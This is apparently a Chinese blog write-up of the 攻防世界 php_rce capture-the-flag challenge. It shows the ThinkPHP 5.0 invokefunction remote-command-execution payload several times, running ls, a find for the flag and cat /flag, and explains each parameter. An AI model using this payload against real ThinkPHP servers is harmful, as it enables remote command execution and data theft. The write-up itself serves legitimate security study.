攻防世界_php_rce(ThinkPHP框架)

莫名有雪2025-02-04 19:03

打开靶场

点链接,发现是广告,没什么特别的,再看题目php.rce,查一下RCE是什么

RCE(Remote Command Execution)远程命令执行,是一种严重的网络安全漏洞。

RCE指攻击者能通过网络远程控制目标系统,执行恶意命令,获取敏感信息、控制设备、传播恶意软件等,对系统安全和数据造成极大威胁。

常见攻击方式 Web应用漏洞利用:如PHP应用中,若对用户输入过滤不严格,攻击者可通过表单、URL参数等注入恶意命令,借助服务器执行命令的函数,像 system() 、 exec() 等实现远程命令执行。

发现ThinkPHP是一个框架

尝试错误参数或任意版本,试错

输入?s=s或?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

  • s=index/\think\Container/invokefunction
    • 在 ThinkPHP 框架中,s 一般作为路由参数。这里指定要调用 \think\Container 类的 invokefunction 方法。\think\Container 是 ThinkPHP 的容器类,其主要作用是管理对象的依赖注入和实例化。invokefunction 方法可能用于动态调用其他函数。
  • function=call_user_func_array
    • function 参数指定要调用的函数为 call_user_func_array。这是 PHP 的一个内置函数,它可以调用任意函数,并将参数以数组的形式传递给被调用的函数。
  • vars[0]=system
    • vars 是一个数组参数,vars[0] 的值为 system,表明要调用的具体函数是 system。在 PHP 里,system 函数用于执行外部系统命令,并返回命令执行的输出结果。
  • vars[1][]=ls
    • vars[1] 是传递给 system 函数的参数,值为 lsls 是类 Unix 系统(如 Linux、macOS)中的命令,用于列出当前目录下的文件和文件夹信息。

发现ThinkPHP漏洞为5.0.20版本,输入

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

  • s=index/\think\app/invokefunction
    • 在 ThinkPHP 框架里,s 通常作为路由参数。这里指定要调用 \think\app 类中的 invokefunction 方法,该方法可能具备动态调用其他函数的功能。
  • function=call_user_func_array
    • function 参数明确要使用 call_user_func_array 函数。此函数是 PHP 的内置函数,它可以调用任意函数,并将参数以数组形式传递给被调用的函数。
  • vars[0]=system
    • vars 是一个数组参数,vars[0] 的值为 system,意味着要调用的具体函数是 systemsystem 函数在 PHP 中用于执行外部系统命令,并将命令执行结果输出。
  • vars[1][]=ls
    • vars[1] 是传递给 system 函数的参数,值为 lsls 是 Linux 或 macOS 等类 Unix 系统中的命令,用于列出当前目录下的文件和文件夹信息。

输入 ,试图通过执行 find / -name "flag" 命令来查找服务器上名为 flag 的文件

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

  • s=index/\think\app/invokefunction
    • s 一般是路由参数,在 ThinkPHP 框架里用于指定路由规则。这里指定的路由路径 index/\think\app/invokefunction 指向了 \think\app 类中的 invokefunction 方法,这个方法可能具备动态调用函数的能力。
  • function=call_user_func_array
    • function 参数指定要调用的函数为 call_user_func_arraycall_user_func_array 是 PHP 的一个内置函数,它能够调用任意用户自定义或内置的函数,并且可以将参数以数组的形式传递给被调用的函数。
  • vars[0]=system
    • vars 是一个数组参数,vars[0] 的值为 system,这意味着要调用的具体函数是 system 函数。在 PHP 中,system 函数用于执行外部系统命令,并将命令的输出返回。
  • vars[1][]=find / -name "flag"
    • vars[1] 是传递给 system 函数的参数数组,这里的值为 find / -name "flag",这是一个 Linux 系统命令,其作用是在根目录 / 下查找所有名为 flag 的文件。

输入

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

  • s=index/\think\app/invokefunction
    • s 是 ThinkPHP 框架里用于指定路由的参数。这里指定的路由指向 \think\app 类的 invokefunction 方法,此方法可能具备动态调用函数的功能。
  • function=call_user_func_array
    • function 参数明确要调用的函数是 call_user_func_array。这是 PHP 的一个内置函数,其作用是调用指定的函数,并将参数以数组形式传递给该函数。
  • vars[0]=system
    • vars 是一个数组参数,vars[0] 的值为 system,表明要调用的具体函数是 system。在 PHP 中,system 函数用于执行外部系统命令,并返回命令执行的输出结果。
  • vars[1][]=cat /flag
    • vars[1] 是传递给 system 函数的参数,值为 cat /flagcat 是 Linux 系统中的一个命令,用于查看文件内容,/flag 是文件路径,这个命令的目的是读取根目录下名为 flag 的文件内容。

参考链接:[CTF_网络安全] 攻防世界 php_rce 解题详析

相关推荐
doubt。3 小时前
3.[羊城杯2020]easyphp
网络·安全·web安全·网络安全·php·代码复审
米码收割机3 小时前
【PHP】基于 PHP 的图片管理系统(源码+论文+数据库+图集)【独一无二】
开发语言·数据库·php
yyytucj3 小时前
优化 PHP-FPM 参数配置:实现服务器性能提升
服务器·开发语言·php
m0_747124534 小时前
用QT做一个网络调试助手
网络·qt·php
莫名有雪6 小时前
攻防世界_simple_php
php
dal118网工任子仪6 小时前
100 ,【8】 buuctf web [蓝帽杯 2021]One Pointer PHP(别看)
开发语言·php
小松聊PHP进阶11 小时前
万字总结PHP与JavaScript、PHP与PHP 实现开箱即用的AES、RSA和较为安全的自定义加解密算法
前端·后端·php
doubt。1 天前
2.[网鼎杯 2020 朱雀组]phpweb
网络·安全·web安全·网络安全·php·代码复审
職場上的造物主1 天前
高清种子资源获取指南 | ✈️@seedlinkbot
python·ios·php·音视频·视频编解码·视频
热门推荐
01DeepSeek本地部署详细指南02DeepSeek r1本地安装全指南03【deepseek】deepseek-r1本地部署-第一步:下载LM Studio04在Windows下安装Ollama并体验DeepSeek r1大模型05将DeepSeek接入Word,打造AI办公助手06使用Ollama 在Ubuntu运行deepseek大模型:以DeepSeek-coder为例07Ollama 安装教程:轻松开启本地大语言模型之旅08DeepSeek学术写作测评第一弹:论文润色,中译英效果如何?09本地部署DeepSeek教程(Mac版本)10保姆级教程:利用Ollama与Open-WebUI本地部署 DeedSeek-R1大模型